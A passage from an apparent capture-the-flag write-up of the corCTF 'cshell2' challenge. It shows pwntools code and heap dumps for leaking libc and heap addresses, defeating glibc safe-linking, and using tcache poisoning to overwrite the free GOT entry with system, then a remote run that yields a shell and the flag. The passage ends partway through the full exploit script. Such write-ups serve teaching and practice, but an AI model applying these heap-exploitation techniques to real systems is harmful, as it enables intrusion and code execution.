YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de13c0	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de13d0	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de13e0	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de13f0	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de1400	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de1410	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de1420	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de1430	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de1440	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de1450	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de1460	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de1470	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de1480	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de1490	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de14a0	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de14b0	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de14c0	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de14d0	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de14e0	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de14f0	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de1500	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de1510	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de1520	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de1530	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de1540	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de1550	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de1560	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de1570	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de1580	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de1590	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de15a0	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de15b0	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de15c0	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de15d0	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de15e0	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de15f0	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de1600	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de1610	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de1620	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de1630	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de1640	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de1650	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de1660	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de1670	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de1680	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de1690	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de16a0	0x5959595959595959	0x0a59595959595959	YYYYYYYYYYYYYYY.	 &lt;-- unsortedbin[all][0] [chunk1]</span></span><br><span class="line"><span class="string">0x1de16b0	0x00007f34f64c3cc0	0x00007f34f64c3cc0	.&lt;L.4....&lt;L.4...</span></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br></pre></td></tr></table></figure>

<p>Then let’s get a heap leak, we request back from the tcache the 8-th chunk, we free the <code>9</code>-th chunk that is allocated right after the <code>8</code>-th to be able to leak its next free pointer same way as for the libc previously. Plus we have to defeat safe-linking. To understand the defeat of safe-linking I advice you to read <a target="_blank" rel="noopener" href="https://www.researchinnovations.com/post/bypassing-the-upcoming-safe-linking-mitigation">this</a>. It ends up to the <code>decrypt_pointer</code> function that makes use of known parts of the encrypted <code>fp</code> to decrypt the whole pointer. I didn’t code the function by myself, too lazy for that, code comes from the <a target="_blank" rel="noopener" href="https://github.com/AeroCTF/aero-ctf-2022/blob/main/tasks/pwn/heap-2022/solution/sploit.py#L44">AeroCTF heap-2022 writeup</a>.</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">decrypt_pointer</span>(<span class="params">leak: <span class="built_in">int</span></span>) -&gt; <span class="built_in">int</span>:</span><br><span class="line">    parts = []</span><br><span class="line"></span><br><span class="line">    parts.append((leak &gt;&gt; <span class="number">36</span>) &lt;&lt; <span class="number">36</span>)</span><br><span class="line">    parts.append((((leak &gt;&gt; <span class="number">24</span>) &amp; <span class="number">0xFFF</span>) ^ (parts[<span class="number">0</span>] &gt;&gt; <span class="number">36</span>)) &lt;&lt; <span class="number">24</span>)</span><br><span class="line">    parts.append((((leak &gt;&gt; <span class="number">12</span>) &amp; <span class="number">0xFFF</span>) ^ ((parts[<span class="number">1</span>] &gt;&gt; <span class="number">24</span>) &amp; <span class="number">0xFFF</span>)) &lt;&lt; <span class="number">12</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> parts[<span class="number">0</span>] | parts[<span class="number">1</span>] | parts[<span class="number">2</span>]</span><br><span class="line"></span><br><span class="line">add(<span class="number">11</span>, <span class="number">1032</span>, <span class="string">b&quot;&quot;</span>, <span class="string">b&quot;&quot;</span>, <span class="string">b&quot;&quot;</span>, <span class="number">1337</span>, <span class="string">b&quot;&quot;</span>)</span><br><span class="line"></span><br><span class="line">delete(<span class="number">9</span>)</span><br><span class="line">edit(<span class="number">11</span>, <span class="string">b&quot;&quot;</span>, <span class="string">b&quot;&quot;</span>, <span class="string">b&quot;&quot;</span>, <span class="number">1337</span>, <span class="string">b&quot;X&quot;</span>*(<span class="number">1032</span> - <span class="number">64</span> + <span class="number">7</span>))</span><br><span class="line"></span><br><span class="line">show(<span class="number">11</span>)</span><br><span class="line">io.recvuntil(<span class="string">b&quot;X&quot;</span>*(<span class="number">1032</span> - <span class="number">64</span> + <span class="number">7</span>) + <span class="string">b&quot;\n&quot;</span>)</span><br><span class="line">heap = decrypt_pointer(pwn.u64(io.recvuntil(<span class="string">b&quot;1 Add\n&quot;</span>)[:-<span class="number">6</span>].ljust(<span class="number">8</span>, <span class="string">b&quot;\x00&quot;</span>))) - <span class="number">0x1000</span></span><br><span class="line">pwn.log.info(<span class="string">f&quot;heap: <span class="subst">&#123;<span class="built_in">hex</span>(heap)&#125;</span>&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># Heap state</span></span><br><span class="line"></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">0x13f6310	0x0000000000000000	0x0000000000000411	................ [chunk8]</span></span><br><span class="line"><span class="string">0x13f6320	0x00000000013f4c0a	0x000000000000000a	.L?.............</span></span><br><span class="line"><span class="string">0x13f6330	0x000000000000000a	0x0000000000000539	........9.......</span></span><br><span class="line"><span class="string">0x13f6340	0x0000000000000000	0x0000000000000000	................</span></span><br><span class="line"><span class="string">0x13f6350	0x0000000000000000	0x0000000000000000	................</span></span><br><span class="line"><span class="string">0x13f6360	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX [chun8-&gt;bio]</span></span><br><span class="line"><span class="string">0x13f6370	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f6380	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f6390	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f63a0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f63b0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f63c0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f63d0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f63e0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f63f0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f6400	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f6410	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f6420	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f6430	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f6440	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f6450	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f6460	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f6470	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f6480	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f6490	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f64a0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f64b0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f64c0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f64d0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f64e0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f64f0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f6500	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f6510	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f6520	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f6530	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f6540	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f6550	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f6560	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f6570	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f6580	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f6590	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f65a0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f65b0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f65c0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f65d0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f65e0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f65f0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f6600	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f6610	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f6620	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f6630	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f6640	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f6650	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f6660	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f6670	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f6680	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f6690	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f66a0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f66b0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f66c0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f66d0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f66e0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f66f0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f6700	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f6710	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX</span></span><br><span class="line"><span class="string">0x13f6720	0x5858585858585858	0x0a58585858585858	XXXXXXXXXXXXXXX.</span></span><br><span class="line"><span class="string">0x13f6730	0x00000000013f4ce6	0xdc8340f7dfc0b0e1	.L?..........@..	 &lt;-- tcachebins[0x410][0/7] [chunk9]</span></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>Then here we are, we leaked both libc and heap base addresses. We just have to to tcache poisoning on <code>free</code>.</p>
<h2 id="Tcache-poisoning-PROFIT"><a href="#Tcache-poisoning-PROFIT" class="headerlink" title="Tcache poisoning + PROFIT"></a>Tcache poisoning + PROFIT</h2><p>We overflow the <code>8</code>-th chunk to overwrite the next freepointer of <code>chunk9</code> that is stored at the HEAD of the <code>0x410</code> tcachebin. Then we got an arbitrary write.<br>We craft a nice header to be able to request it back from the tcache, and we encrypt the <code>next</code> with the location of the <code>chunk9</code> to pass safe-linking checks.</p>
<p>Given we hiijack GOT we initialized properly some pointers around to avoid segfaults. We do not get a write into the GOT entry of <code>free</code> cause it is unaliagned and <code>malloc</code> needs <code>16</code> bytes aligned next free pointer.</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">edit(<span class="number">11</span>, <span class="string">b&quot;&quot;</span>, <span class="string">b&quot;&quot;</span>, <span class="string">b&quot;&quot;</span>, <span class="number">1337</span>, <span class="string">b&quot;X&quot;</span>*(<span class="number">1032</span> - <span class="number">64</span>) + pwn.p64(<span class="number">0x411</span>) + pwn.p64(((heap + <span class="number">0x2730</span>) &gt;&gt; <span class="number">12</span>) ^ (exe.got.free - <span class="number">0x8</span>)))</span><br><span class="line"></span><br><span class="line"><span class="comment"># dumb</span></span><br><span class="line">add(<span class="number">12</span>, <span class="number">1032</span>, <span class="string">b&quot;&quot;</span>, <span class="string">b&quot;&quot;</span>, <span class="string">b&quot;&quot;</span>, <span class="number">1337</span>, <span class="string">b&quot;&quot;</span>)</span><br><span class="line"></span><br><span class="line">io.sendlineafter(<span class="string">b&quot;5 re-age user\n&quot;</span>, <span class="string">b&quot;1&quot;</span>)</span><br><span class="line">io.sendlineafter(<span class="string">b&quot;index: \n&quot;</span>, <span class="built_in">str</span>(<span class="number">13</span>).encode())</span><br><span class="line">io.sendlineafter(<span class="string">b&quot;Enter size (1032 minimum): \n&quot;</span>, <span class="built_in">str</span>(<span class="number">1032</span>).encode())</span><br><span class="line">io.sendafter(<span class="string">b&quot;Input firstname: \n&quot;</span>, pwn.p64(libc.address + <span class="number">0xbbdf80</span>))</span><br><span class="line">io.sendafter(<span class="string">b&quot;Input middlename: \n&quot;</span>, pwn.p64(libc.sym.system))</span><br><span class="line">io.sendafter(<span class="string">b&quot;Input lastname: \n&quot;</span>, pwn.p64(libc.address + <span class="number">0x71ab0</span>))</span><br><span class="line">io.sendlineafter(<span class="string">b&quot;Input age: \n&quot;</span>, <span class="built_in">str</span>(<span class="number">0</span>).encode())</span><br><span class="line">io.sendafter(<span class="string">b&quot;Input bio: \n&quot;</span>, pwn.p64(libc.address + <span class="number">0x4cb40</span>))</span><br><span class="line"></span><br><span class="line"><span class="comment"># Finally</span></span><br><span class="line"></span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line">io.sendline(<span class="string">b&quot;cat flag.txt&quot;</span>)</span><br><span class="line">pwn.log.info(<span class="string">f&quot;flag: <span class="subst">&#123;io.recvline()&#125;</span>&quot;</span>)</span><br><span class="line"></span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<p>Here we are:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">nasm@off:~/Documents/pwn/corCTF/cshell2$ python3 exploit.py REMOTE HOST=be.ax PORT=31667</span><br><span class="line">[*] &#x27;/home/nasm/Documents/pwn/corCTF/cshell2/cshell2&#x27;</span><br><span class="line">    Arch:     amd64-64-little</span><br><span class="line">    RELRO:    Partial RELRO</span><br><span class="line">    Stack:    Canary found</span><br><span class="line">    NX:       NX enabled</span><br><span class="line">    PIE:      No PIE (0x3fb000)</span><br><span class="line">    RUNPATH:  b&#x27;.&#x27;</span><br><span class="line">[*] &#x27;/home/nasm/Documents/pwn/corCTF/cshell2/libc.so.6&#x27;</span><br><span class="line">    Arch:     amd64-64-little</span><br><span class="line">    RELRO:    Partial RELRO</span><br><span class="line">    Stack:    Canary found</span><br><span class="line">    NX:       NX enabled</span><br><span class="line">    PIE:      PIE enabled</span><br><span class="line">[+] Opening connection to be.ax on port 31667: Done</span><br><span class="line">[*] libc: 0x7f1d388db000</span><br><span class="line">[*] heap: 0x665000</span><br><span class="line">[*] flag: b&#x27;corctf&#123;m0nk3y1ng_0n_4_d3bugg3r_15_th3_b35T!!!&#125;\n&#x27;</span><br><span class="line">[*] Switching to interactive mode</span><br><span class="line">$</span><br></pre></td></tr></table></figure>

<h2 id="Appendices"><a href="#Appendices" class="headerlink" title="Appendices"></a>Appendices</h2><p>Final exploit:</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># this exploit was generated via</span></span><br><span class="line"><span class="comment"># 1) pwntools</span></span><br><span class="line"><span class="comment"># 2) ctfmate</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"><span class="keyword">import</span> pwn</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># Set up pwntools for the correct architecture</span></span><br><span class="line">exe = pwn.context.binary = pwn.ELF(<span class="string">&#x27;cshell2&#x27;</span>)</span><br><span class="line">libc = pwn.ELF(<span class="string">&quot;./libc.so.6&quot;</span>)</span><br><span class="line"></span><br><span class="line">pwn.context.delete_corefiles = <span class="literal">True</span></span><br><span class="line">pwn.context.rename_corefiles = <span class="literal">False</span></span><br><span class="line">pwn.context.timeout = <span class="number">2000</span></span><br><span class="line"></span><br><span class="line">host = pwn.args.HOST <span class="keyword">or</span> <span class="string">&#x27;127.0.0.1&#x27;</span></span><br><span class="line">port = <span class="built_in">int</span>(pwn.args.PORT <span class="keyword">or</span> <span class="number">1337</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">local</span>(<span class="params">argv=[], *a, **kw</span>):</span><br><span class="line">    <span class="string">&#x27;&#x27;&#x27;Execute the target binary locally&#x27;&#x27;&#x27;</span></span><br><span class="line">    <span class="keyword">if</span> pwn.args.GDB:</span><br><span class="line">        <span class="keyword">return</span> pwn.gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">return</span> 